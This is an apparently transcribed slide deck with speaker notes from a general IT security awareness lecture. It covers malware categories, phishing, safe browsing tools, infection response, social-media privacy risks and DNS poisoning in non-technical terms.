  • 38. false positive is harmful Routers of my office and home are same bland. My office to my home is 30 minites drive. Release my mobile PC from my office LAN. I connect my mobile PC to my home LAN, my personal firewall blocked all connection because of compromise of the router. And way of unlocking is not present.
  • 39. My friend’s case She updates her Firefox. After update, she starts the Firefox agin. She saw a pop up querying yes or no, and she clicked “yes” almost instantly. And she has lost web connection ever. Firefox seems compromised. for your safety block connection Yes/No
  • 40. recommended tools for web surfing check wether the site is using EV-SSL, especially in using online banking. useful addons for browsers Request policy for Firefox Netcraft tool bar WOT(Web of Trust) useful for Googlers useful WEB page Virus total https://www.virustotal.com/
  • 42. E-Mail handling HTML format is risky embedded scripts embedded Web links phishing is done by sending email which includes faked link. phishing for WebMail account information is increasing. Be care of attached files zip encoded file is dangerous if necessary, scan by anti-malware and “virus total” before open file. spam or phishing mail may come from your friends
  • 43. Can we find malware infection? It is difficult to find malware infection! Modern? malware works quietly to avoid disclosure of its existence. Types and number of malware is increasing day by day. Anti-malware vendors have difficulty in catching newly developed malware.
  • 44. in case of malware infection Do’nts hide that your PC is infected. Continue using the infected system. Use “System Restore” function for recovery
  • 45. in case of malware infection Do’s Stop using the infected computer! Call the incident response team or the person in charge of the network system of your section and wait his/her for suggestions!
  • 46. Safe recovery procedure from infection 1. format hard disk(not quick format) 2. install system from read-only media 3. patch it 4. recover data from backup 1. backups can be contaminated.
  • 47. Recovery from System troubles MacOS TimeMachine is helpful Windows 7 System Restore System Recovery
  • 48. Agenda Keywords in Security Current trends and topics in IT security about Malware/malicious Web site How to avoid malicious activities SNS problems the Basic problem on the Internet Concluding remarks
  • 49. SNS problems Privacy problems Cyberstalking Flaming a tweet can cause flaming Sexting/Revenge porn A leakage to the Internet is unrecoverable!
  • 50. Stalking case in Zushi The murder made querying tweets to SNS to get victim’s address. He was also using popular FAQ site for victim’s address. He was also using a private detective. Zushi case on a newspaper
  • 51. Don’ts in using SNS disclose geological information or other private matters check EXIF of digital photo retweet or reply to asking someone’s address or private information post private photo of yours or your friends see more, refer to this site
  • 52. Agenda Keywords in Security Current trends and topics in IT security about Malware/malicious Web site How to avoid malicious activities SNS problems the Basic problem of DNS Concluding remarks
  • 53. the Basic problem on the Internet DNS is a protocol and system to convert domain names to IP address. Ill configured or ill managed home routers can be easily compromised. Intruders may change DNS server configuration. It happened in Mexico. DNS poisoning is easy. send fake query and at the same time generate and send fake answers. If poisoned, users of poisoned server could be led to the fake server. And you can imagine what happens.
  • 56. Agenda Keywords in Security Current trends in security Current topics in IT security about Malware/malicious Web site How to avoid malicious activities SNS problems the Basic problem on the Internet Concluding remarks
  • 57. Concluding Remarks Severe problems of the Internet were found in year 2014. ID and password system may end. Many new malware and tools are developing daily. Be careful when you are posting on SNS etc. Check and care your home routers, network attached storage, TV set, VDR, etc. properly. Basic knowledge about the Internet technology is important for your safety

Editor's Notes

  • #3: Do you remember Y2K problem? about fifteen years ago. It is said that date function of many computers include embedded microprocessors will become faulty at midnight of the last day of 1999. At that time, in many computer programs, only two digits were provided to store year part of date and time data for saving computer memory usage. At the midnight, 99 will change to 00, and and it was believed that it will cause logical error in many computer programs. But nothing happened. There and then, we have had many attacks and password cracking trying to get control of networked computers.
  • #4: Today I will talk about these topics. At first I’ll present a few basic concepts in computer and network security.
  • #5: English is very convenient, because we can distinguish the difference between a term “internet” or “internetworking” and the Internet. A term internet or internetworking means an idea or concept of connecting computer networks. On the other hand, A proper noun, the Internet is a global network made by connecting existing smaller IP networks. The Internet is not Web system nor Web browsing. The Internet is an infrastructure of these applications. We can see and buy movies, musics through the Internet. Television sets, Video recorders, air conditioners are now connected to the Internet and controlled through the Internet. But these become another security risk.
  • #6: CIA of the keyword of security. C for confidentiality. Avoid sniffing of confidential information. Limits accessing to the confidential information. Integrity keep tracking of changes.
  • #8: Now I show you current trends and topics about IT security. Last year, severe bugs and defects were found in basic software or protocols to which the Internet depends on.
  • #26: Malware is a generic name of software which is installed without consent and harms computers. Current malware becomes complicated and has many functions. So they aren’t suit to these classification.
  • #27: Old computer viruses displays messages or simple animations on the screen of PC. Those are developed by developers’ technical interests to demonstrate their technical capabilities. For the reason, old style viruses are very active to copy them to other files or other systems. So such viruses can be easily found by monitoring infected systems’ behavior or network traffic. However, current viruses do their functions quietly to avoid disclosure, update themselves through network. They may be part of so called bot nets. It is thought that anti-virus softwares can find only 70% of existing viruses. New viruses are increasing daily. One can buy viruses or virus generation tools from markets. It is said that the cost of a virus is several hundred yens. CodeRed and Nimda were notable ones.
  • #28: Worm is a program replicating itself to another system by using security holes. It may have payloads. Major payload program of worm is “backdoor” program. When backdoor program is installed, it reports the IP address of the infected computer to the developer of the worm and wait commands from her or she. The Slammer and Blaster were known.
  • #29: Trojan horse is named after the Greek myth. A trojan horse seems like a useful program but malicious codes are in it. This types of software does not have an ability of self replication nor infection like viruses or worms.
  • #30: A spyware is a software for spying the system to which it was installed. An adware display advertisements to screen. This type of software is malicious only when it is installed without consumers’ consent. Many free software does such activity. But we can use such software in spite of giving our private information or accepting advertisements. So it is free. Many softwares for smart phone have such ability also. Of course, good developers of such software declares that what his/her software does.
  • #31: Have you ever seen a red of yellow alert popping up during web surfing? Such alert informs you that your system is found infected or needs garbage collection, and recommends to download and install a software. Ransomware is a software which limits the accessibility to the computer which it infect. And requests ransom paid to the developer of the software to remove limitation it sets. Cryptware is a kind of ransomware. It encrypts files in the system which it infect. And demands money to decode encrypted files. But it is lucky you get control of your computer back by paying. To avoid this type of software, do neglect such pop up alerts.
  • #32: Animals are gathering to the watering hole for drinking water. Lion may catch preys there easily by waiting there.
  • #33: This type of attack is prepared carefully and precisely. Attackers first get control of web sites where victims often visit. Then they set malware to push to the victims browsers when they visit those sites again. Such malware is crafted and customized to fit into the victims' culture, so it is very difficult to find it by ordinary anti-malware. Such targeted attacks are called as spear attack.
  • #34: GOM Player is a popular software for viewing video contents. It can handle many types of video format. The distribution site was compromised and contaminated files were placed there. The EmEditor is quite useful text editor. When the software is started, it makes an access to the site, whether software updates are available or not. The attacker uses this function to install malware. I heard that none of users are infected because the malware was designed to work only when accesses come from only a few sites.
  • #36: Software has bugs. Some bugs cause severe security problems. Such bug is called Security hole. So bug fix is necessary to keep system’s safety and soundness. Microsoft releases software update on every second Tuesday. The day is called the black Tuesday. In Japan, it’s Wednesday. But do not try to update on that day. Windows Update may cause troubles, because of updates may have bugs. Latest Windows update which released in last December cause hang up on many computers. Recovery from troubles in software update is a hard task. So wait several days or a week before the update.
  • #37: Complete bugless software does not exist.
  • #39: The IP address of the routers are same. I left my office to go home. When I came back home and connected my computer to my home LAN, a red alert pop ups to tell that my home router is cracked. And the software tells that it blocks all network connections. The reason is simple, but I can’t find the way to unlock the situation. So I should uninstall the software.
  • #40: Update of the “firefox” browser is often. When she started the firefox, and it told her that the update was available. So, she did that update. Next time, she started the firefox, she saw a pop up alert displayed by her anti-virus software. It told that the browser was modified lately and possible poisoning of the software. We may click “yes” to such query, because almost such queries expect “yes” by default. But in this case, she should select “No” button to continue using the firefox browser. Our default action, clicking “yes”, to any query may harm.
  • #41: “Request policy” is a tool to avoid off-site javascript like “google search”, “google analytics”, “double click”, and so on. Allowing such script may cause privacy problems or security problems. A cookie or cookies may be extracted when browsing such site.. .
  • #45: If
  • #46: If your system is infected by malware, stop using the system and call to consult the appropriate person. If your organization provides the incident handling guideline, you should follow the procedure on it.
  • #48: Software updates by the manufacturer sometimes cause system trouble like blue screen. In such case, you should recover your system from so called “Safe mode”. If the system is coming up, we are very lucky. On Windows, we can use “System Restore” to undo the changes made on the system. On Mac, “Time machine” is helpful.